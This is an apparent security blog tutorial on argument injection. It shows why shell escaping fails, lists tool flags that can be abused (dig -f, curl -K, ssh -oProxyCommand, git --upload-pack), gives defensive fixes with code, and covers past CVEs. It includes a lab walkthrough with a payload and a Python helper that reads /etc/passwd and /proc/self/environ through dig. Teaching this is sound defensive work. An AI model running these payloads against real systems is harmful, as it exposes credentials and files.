Argument injection is the variant of command injection that survives the fix most people reach for. The application correctly wraps the user value with escapeshellarg, the shell sees one well-quoted argument, and no semicolons or backticks get a chance to break out. The bug is one layer further in: the called binary parses its own arguments, sees a leading dash, and treats the attacker's value as a flag. The shell never noticed anything was wrong, because nothing was wrong at the shell layer.
This is the variant deep dive that sits under the remote code execution practitioner guide and alongside OS command injection. I cover what argument injection actually is, why escapeshellarg and escapeshellcmd do not stop it, the catalogue of common Unix tools where this is the realistic attack, a walkthrough against the rce-basic lab's /lookup.php, the three-layer fix, and the CVE pattern across Git, PHPMailer, ImageMagick, and friends.
TL;DR
Argument injection happens when a user value, correctly shell-quoted, still reaches a binary that parses leading dashes as flags. Classic command injection inserts a whole new command through shell metacharacters (;, |, $()). Argument injection does not break out of the command at all: it abuses the same command's own option parser. escapeshellarg('-f /etc/passwd') produces '-f /etc/passwd', which is one valid shell-quoted argument, but dig looks at the leading - and reads the rest as the -f batch-file flag, opening any file www-data can read. escapeshellcmd is worse: it escapes only shell metacharacters, so it leaves the dash alone and does not keep the value together as a single argument either. The catalogue of vulnerable tools is wide: dig -f, curl -K/-o, find -exec, tar -T, git --upload-pack, ssh -oProxyCommand, wget --use-askpass. The fix is three layers deep: stop calling shells (use argv arrays), pass -- before the user argument so the binary stops parsing flags, and validate every value against a strict allowlist before any of that.
Command injection vs argument injection
These two get conflated in writeups because they share an outcome (the attacker runs something they should not). The mechanism is different and the fix is different, so it is worth pinning the distinction.
OS command injection inserts a new command into the shell's parse tree. The application builds a single string and hands it to /bin/sh -c. The shell tokenises that string, sees a metacharacter (;, |, &&, backticks, $(), newline), and runs the attacker's command alongside the intended one. The break-out happens at the shell layer, before the target binary is invoked. The full deep dive on this is in OS command injection.
Argument injection does not insert a new command at all. The original command is the only one that runs. The attacker's value is one argument to that command, correctly delimited, correctly shell-quoted. What the attacker controls is what that argument means to the binary's own option parser. A leading dash flips the value from "the hostname to look up" to "the flag that tells dig to read queries from a file".
The two are catalogued separately, as CWE-88 (argument injection) and CWE-78 (OS command injection). They look almost identical at the call site. They feel completely different once you start exploiting them.
Why escapeshellarg does not stop this
escapeshellarg is built to do exactly one job: take a string, wrap it so the shell parses it as a single argument no matter what is inside it. It single-quotes the value and escapes any embedded single quotes. That is correct, and that is all it does.
```php
escapeshellarg('-f /etc/passwd');
// produces: '-f /etc/passwd'
```

The result is one well-formed shell-quoted argument. /bin/sh -c "dig '-f /etc/passwd'" tokenises into two argv elements that get passed to execve: dig and -f /etc/passwd. The shell did its job perfectly. escapeshellarg did its job perfectly. The bug is that dig is now sitting with argv[1] = "-f /etc/passwd" and its own option parser is about to look at it.
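Python's shlex.quote does the same single-quoting job as escapeshellarg, and shlex.split tokenises a command line using POSIX word-splitting rules (without expansion). Together they are a convenient way to see which argv the binary would receive. What follows is a minimal sketch. It assumes shlex is a fair stand-in for /bin/sh word splitting on these inputs, and argv_for is a hypothetical helper name:

```python
import shlex

def argv_for(user_value: str) -> list[str]:
    # Quote the value the way escapeshellarg would, then split the resulting
    # command line into argv with POSIX word-splitting rules.
    command = "dig " + shlex.quote(user_value)
    return shlex.split(command)

print(shlex.quote("-f /etc/passwd"))  # '-f /etc/passwd'
print(argv_for("-f /etc/passwd"))     # ['dig', '-f /etc/passwd']
print(argv_for("localhost;id"))       # ['dig', 'localhost;id']
```

Quoting does its job in both cases: the semicolon payload stays inert inside one argument. The dash payload, however, is still a single argv element that begins with -, and that is all the binary's option parser needs.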
escapeshellcmd is even less help, and I have seen developers reach for it thinking it is the stronger version. The PHP manual says it escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands. That list is shell metacharacters: &, ;, `, |, $, parentheses, backslash, unpaired quotes, and a few others. A leading dash is not a shell metacharacter, because the shell does not parse dashes specially. escapeshellcmd('-f /etc/passwd') returns -f /etc/passwd unchanged. That string is concatenated into the command without quoting and handed to the shell, which splits it on whitespace. dig ends up with -f and /etc/passwd as two separate argv elements: the batch-file flag and the file it should read.
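To see why, here is a rough Python approximation of escapeshellcmd. The escape_metachars name is hypothetical, and the character set follows the PHP manual's list minus the unpaired-quote and \xFF special cases, so treat it as a sketch rather than a faithful port. shlex.split again stands in for the shell's word splitting:

```python
import shlex

# Approximation of the characters PHP's escapeshellcmd backslash-escapes.
# Quote handling (escaped only when unpaired) and \xFF are omitted for brevity.
SHELL_METACHARS = set("&#;`|*?~<>^()[]{}$\\\n")

def escape_metachars(value: str) -> str:
    """Hypothetical escapeshellcmd-style escaper: backslash every metacharacter."""
    return "".join("\\" + ch if ch in SHELL_METACHARS else ch for ch in value)

escaped = escape_metachars("-f /etc/passwd")
print(escaped)                           # -f /etc/passwd  (nothing to escape)
print(shlex.split("dig " + escaped))     # ['dig', '-f', '/etc/passwd']
print(escape_metachars("localhost;id"))  # localhost\;id
```

The semicolon gets its backslash, while the dash and the space pass straight through. Word splitting then hands dig the flag and its file operand as two clean arguments.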
Neither function is broken. They are both doing what they are documented to do. The mistake is expecting either of them to know what the binary on the other end will do with its arguments.
The catalogue of tools where this is the realistic attack
Argument injection is only useful when the target binary has a flag that does something interesting. Almost every classic Unix tool has at least one. The ones I have actually exploited in practice or seen in published advisories:
- dig -f <file> reads DNS queries from a file. Pointed at /etc/passwd or any other readable file, it tries to parse each line as a hostname, fails, and prints the offending line as part of the error message. Net effect: file read. This is the lab's example below.
- curl -K <configfile> reads a curl config file. The config can specify url = ... (request anywhere, hello SSRF), output = ... (write the response anywhere www-data can write, including over PHP files in the web root), header = ..., user-agent = .... One flag, an entire scripting language.
- curl -o <path> writes the response body to an attacker-named file. Combined with a controlled URL, that is arbitrary file write.
- find <path> -exec <cmd> {} \; runs an arbitrary command for each match. Suppose the application splices a user-supplied "search path" into the find command line, and the attacker's value reaches find as the separate arguments -exec id ;. find treats them as the action expression and runs id. Full RCE.
- tar -T <file> reads filenames to archive from a file. Combined with --checkpoint-action=exec=... in GNU tar, that is full command execution. The standalone --checkpoint-action is itself a famous primitive.
- git fetch --upload-pack=<cmd> and git clone --upload-pack=<cmd>. Older Git let an attacker-controlled upload-pack value run a command on the client. The submodule URL variant (CVE-2018-17456) abused the same class through a .gitmodules URL starting with -. The class is generic even though the specific bugs are patched.
- ssh -o ProxyCommand=<cmd> is the canonical OpenSSH argument-injection primitive. Any application that builds an ssh command line with a user-controlled hostname is one -oProxyCommand= away from RCE.
- wget --use-askpass=<cmd> runs the named program to prompt for a password and uses its output. Attacker-controlled, full execution.
- wget --execute=<command> runs a wgetrc directive. The attacker can set arbitrary wgetrc options that way, including output_document for file write.
- rsync -e <cmd> sets the remote-shell command; attacker-controlled, full execution.
- zip --unzip-command=<cmd> and a handful of other archive tools have analogous escape hatches.
- mysql --defaults-file=<path> loads options from a file the attacker can name. The loaded options include init-command, which runs an attacker-chosen SQL statement on connect.
The common shape is "a flag that points at an external resource or a sub-program". Any binary with one of those is an argument-injection sink when a shell-quoted string starting with a dash reaches it.
Walking the lab
The rce-basic lab in the techearl-labs repo ships the exact sink: shell_exec('dig ' . escapeshellarg($domain)) at /lookup.php. Boot it:
```shell
docker compose up rce-basic
```

It listens on http://localhost:8085. The exploit is one request with a URL-encoded space:

```http
GET /lookup.php?domain=-f%20/etc/passwd
```
escapeshellarg wraps the value, so what the shell tokenises is one argument: -f /etc/passwd. The shell hands dig that single argv element. dig looks at the leading -, parses -f as the batch-file flag, opens /etc/passwd, and tries to read each line as a DNS query. Every line fails to parse as a hostname, so dig emits a parse error for each one, and the error output contains the offending line: root:x:0:0:root:/root:/bin/bash, daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin, and so on. The response body contains the contents of /etc/passwd.
Any file readable by uid 33 (www-data) is exfiltrable through the same path. /etc/hosts, /proc/self/environ, /var/log/apache2/access.log, application source files, .env files that someone forgot to put outside the docroot. The bug is the file read, the impact is whatever happens to be on disk.
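The request can also be scripted so you can pull arbitrary paths. This minimal Python sketch assumes the lab is listening on localhost:8085 as above. exploit_url and read_file_via_dig are hypothetical helper names:

```python
from urllib.parse import quote
from urllib.request import urlopen

# Address of the rce-basic lab from the walkthrough; adjust if you changed the port.
LAB_LOOKUP_URL = "http://localhost:8085/lookup.php"

def exploit_url(payload: str) -> str:
    # quote() leaves '-' and '/' alone and encodes the space as %20
    return f"{LAB_LOOKUP_URL}?domain={quote(payload)}"

def read_file_via_dig(path: str, timeout: float = 5.0) -> str:
    """Send the -f payload for `path` and return the raw response body."""
    with urlopen(exploit_url(f"-f {path}"), timeout=timeout) as response:
        return response.read().decode("utf-8", errors="replace")
```

With the lab running, read_file_via_dig("/etc/hosts") or read_file_via_dig("/proc/self/environ") should return dig's output with the file's lines embedded in it.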
The ;id payloads that work against /ping.php do not work here. escapeshellarg('localhost;id') produces 'localhost;id', which dig receives as one argument and treats as a malformed hostname. The metacharacter defence works. What is missing is any defence at the flag layer.
The fix in three layers
There is no single line of code that closes the class. The reliable pattern composes three defences, each one a real layer rather than a paranoid duplicate of the one before it.
1. Use argv arrays, never shells
The deep version of this is in the OS command injection article. The summary is that every modern language exposes a "run a binary directly via execve" API that takes the command and its arguments as separate values. No shell is invoked, no string concatenation happens at any layer, and the binary receives exactly the arguments you passed.
```php
// PHP 7.4+: passing the command as an array bypasses the shell
$process = proc_open(
    ['dig', '+short', $domain],
    [1 => ['pipe', 'w'], 2 => ['pipe', 'w']],
    $pipes
);
```

```python
import subprocess

result = subprocess.run(
    ['dig', '+short', host],
    capture_output=True, text=True, timeout=5,
)
```

```javascript
const { execFile } = require('child_process');
execFile('dig', ['+short', host], (err, stdout) => { /* ... */ });
```

```go
// import "os/exec"
out, err := exec.Command("dig", "+short", host).Output()
```

Argv arrays alone do not close argument injection. The shell is out of the picture, but the binary still parses -f as a flag whether the argument arrived through a shell or through execve. The argv form is a prerequisite, not the whole fix.
2. Pass -- before user arguments
Most well-behaved Unix tools accept -- as an end-of-options marker. Anything after -- is treated as a positional argument even if it starts with a dash. The pattern is:
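```php
$process = proc_open(
    ['dig', '+short', '--', $domain],
    [1 => ['pipe', 'w'], 2 => ['pipe', 'w']],
    $pipes
);
```

```python
result = subprocess.run(
    ['dig', '+short', '--', host],
    capture_output=True, text=True, timeout=5,
)
```

With -- in place, a dig build that honours the marker reads -f /etc/passwd as a literal positional argument, fails to parse it as a hostname, and returns an error. No file read. Confirm that your installed dig actually accepts -- before relying on it.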
Two caveats. First, not every tool honours --. Some legacy tools, and tools with hand-rolled (non-getopt) parsers, either ignore the marker, reject it as an unknown option, or treat it inconsistently. Check the manual for the specific tool, and test the installed version, before relying on this. Second, -- only gates the arguments that come after it. If the application puts the user value in a flag's value slot, as in --upload-pack=<value> or -o <value>, that value is consumed as part of the flag before the parser ever reaches --. The marker protects positionals, not flag values.
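Both the marker and its limit show up with Python's getopt module, which implements the same convention. This is a sketch: classify is a hypothetical helper, and 'f:' models a -f FILE option:

```python
import getopt

def classify(argv: list[str]) -> tuple[list[tuple[str, str]], list[str]]:
    """Split argv the way a getopt-based tool would; 'f:' models a -f FILE option."""
    return getopt.getopt(argv, "f:")

user_value = "-f/etc/passwd"

# Without the marker, the user value is parsed as the -f flag.
print(classify([user_value]))
# After '--', the same bytes are only a positional argument.
print(classify(["--", user_value]))
# A user value placed in a flag's value slot is consumed before '--' is reached.
print(classify(["-f", "/etc/passwd", "--", "example.com"]))
```

The first call returns the value as an option and the second returns it as a positional. In the third, /etc/passwd is still bound to -f even though a -- follows it.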
3. Validate against a strict allowlist before shelling out
The first two layers prevent the shell and the binary from misinterpreting the value. The third layer prevents the value from getting that far if it has no business being there. Every user-supplied field has a legal character set; refuse anything outside it.
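```php
// \A and \z anchor the whole string; a plain $ would also accept a trailing newline
if (!preg_match('/\A[a-zA-Z0-9][a-zA-Z0-9.-]*\z/', $domain)) {
    http_response_code(400);
    exit('invalid hostname');
}
```

```python
import re

if not re.fullmatch(r"[a-zA-Z0-9][a-zA-Z0-9.-]*", host):
    raise ValueError("invalid hostname")
```

A hostname allowlist is roughly [a-zA-Z0-9][a-zA-Z0-9.-]*: letters, digits, dots, and hyphens, with a letter or digit first. The hyphen has to be in the set because real hostnames contain hyphens, so the first-character rule is what keeps a leading dash out. -f /etc/passwd is rejected at the validator, before any subprocess call happens. A filename allowlist would be different (no .., no leading /, no ~). A UUID allowlist would be tighter still. The point is that the validator knows the field's vocabulary and refuses everything else.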
Allowlists beat blocklists every time. A blocklist of "dashes, semicolons, backticks" misses tabs, newlines, and the next character the attacker tries. An allowlist of "the characters this field is allowed to contain" does not need to anticipate the attacker, because it only says yes to known-good values.
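A small comparison makes the difference concrete. The blocklist here (BLOCKED) is a hypothetical one built from the "dashes, semicolons, backticks" example. The allowlist is the hostname pattern with a letter-or-digit first character:

```python
import re

# Allowlist: a letter or digit first, then letters, digits, dots, hyphens.
HOSTNAME_RE = re.compile(r"[a-zA-Z0-9][a-zA-Z0-9.-]*")

# Hypothetical blocklist of "known bad" characters.
BLOCKED = set("-;`")

def allowlist_ok(value: str) -> bool:
    return HOSTNAME_RE.fullmatch(value) is not None

def blocklist_ok(value: str) -> bool:
    return not any(ch in BLOCKED for ch in value)

for candidate in ["example.com", "-f /etc/passwd", "example.com\nid", "a\tb", "my-host.example.com"]:
    print(repr(candidate), allowlist_ok(candidate), blocklist_ok(candidate))
```

The blocklist lets the newline and tab values through. It also rejects the legitimate my-host.example.com, because banning dashes outright catches real hostnames too.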
Layered together
```python
import re, subprocess

def lookup(host: str) -> str:
    if not re.fullmatch(r"[a-zA-Z0-9][a-zA-Z0-9.-]*", host):
        raise ValueError("invalid hostname")
    result = subprocess.run(
        ["dig", "+short", "--", host],
        capture_output=True, text=True, timeout=5,
    )
    return result.stdout
```

Three layers of defence. The validator refuses anything that is not a hostname. The argv array means no shell. And -- means dig will not parse a positional as a flag even if the validator is somehow bypassed. Each layer is independent. None of them is the "real" fix; together they close the class.
The strongest version of the fix is the one I keep landing on in code review: do not shell out at all. PHP has dns_get_record. Python has dns.resolver in the third-party dnspython package, and socket.getaddrinfo in the standard library for plain address lookups. Node has dns.resolve. Go has net.LookupHost. The library version has no shell, no argv parser, no flag handling, and no argument-injection surface. If the work can be done with a library call, the library call is the right answer.
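For a Python service doing what the lab does, the standard library's socket.getaddrinfo resolves a name to addresses without spawning any process. This is a minimal sketch. It returns whatever A/AAAA addresses the system resolver produces (including /etc/hosts entries), which is close to, but not the same as, dig +short. The validator is kept because it still documents the field's vocabulary:

```python
import re
import socket

HOSTNAME_RE = re.compile(r"[a-zA-Z0-9][a-zA-Z0-9.-]*")

def lookup(host: str) -> list[str]:
    """Resolve host to IP addresses without spawning any subprocess."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError("invalid hostname")
    # proto=IPPROTO_TCP avoids duplicate entries for each socket type
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    # Each entry is (family, type, proto, canonname, sockaddr); sockaddr[0] is the address.
    return sorted({info[4][0] for info in infos})
```

There is no argv anywhere in this path, so a value like -f /etc/passwd has nothing to be parsed as.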
Real-world incidents
A short tour of argument-injection-shaped CVEs. The version-specific details live in the linked NVD entries; the lessons below are what I want to remember.
- PHPMailer, CVE-2016-10033 (December 2016). PHPMailer before 5.2.18 passed the sender address as the -f argument to sendmail without sanitising it. An attacker who controlled the From address on a contact form could inject additional sendmail flags, notably -X (write a debug log to an attacker-named path), turning the form into an arbitrary file write into the web root. With a .php extension on the write path, that escalates to RCE. The class was the same as the lab's dig -f issue: a value that reached an external binary's option parser through a path that had not anticipated dashes.
- Git submodule URL, CVE-2018-17456 (October 2018). Git before 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 allowed a .gitmodules file to specify a submodule URL that started with a dash. When git clone --recurse-submodules ran, the URL was passed to git fetch (and ultimately to a child process), where the leading dash was parsed as a flag. The attacker-controlled .gitmodules could include --upload-pack= or -c protocol.ext.allow=always ext::... to achieve command execution on the client cloning the repository. Patched by refusing submodule URLs that start with a dash. The lesson: even non-shell call sites (git invoking git) need flag-parsing discipline.
- ImageMagick "ImageTragick", CVE-2016-3714 (May 2016). Not pure argument injection (the underlying issue was the delegate mechanism running shell-out helpers with user-controlled strings), but the practical exploit shape was "field that reaches a binary that interprets it as flags or commands". Any web app that ran ImageMagick on uploaded images inherited the risk. The mitigation pattern (the policy.xml "remove dangerous coders" config) is essentially "lock down which external binaries the library is willing to invoke at all", which is the library-level version of the allowlist defence.
GitLab and a handful of other large applications have shipped argument-injection CVEs in recent years as well; before quoting a specific CVE number or CVSS score, pull the current NVD entry rather than rely on memory.
Where to go next
This article is the deep dive on the variant that survives shell escaping. The siblings and the wider map:
- Up to the remote code execution practitioner guide for the full RCE taxonomy.
- Across to OS command injection for the classic shell-metacharacter sink, the argv-array pattern, and the four-payload walkthrough against /ping.php.
- Across to server-side template injection for the same data-becomes-code mistake one layer up in template engines.
- Across to eval injection for the dumbest version of the bug: user input handed straight to the language runtime.
- Back to the web application security vulnerabilities taxonomy for the hub.
The recurring lesson is the one I keep writing about across this whole family. Every place untrusted input crosses into something that parses bytes as code is a sink. For argument injection that something is not the shell, it is the binary's own option parser, and the only reliable defence is to make the crossing not happen: validate the value before it travels, pass it as a positional with -- in front, and prefer a library call over a subprocess whenever one exists.
Sources
Authoritative references this article was fact-checked against.
- CWE-88, Argument Injection or Modification (cwe.mitre.org)
- OWASP, Command injection (owasp.org)
- PHP, escapeshellcmd (php.net)





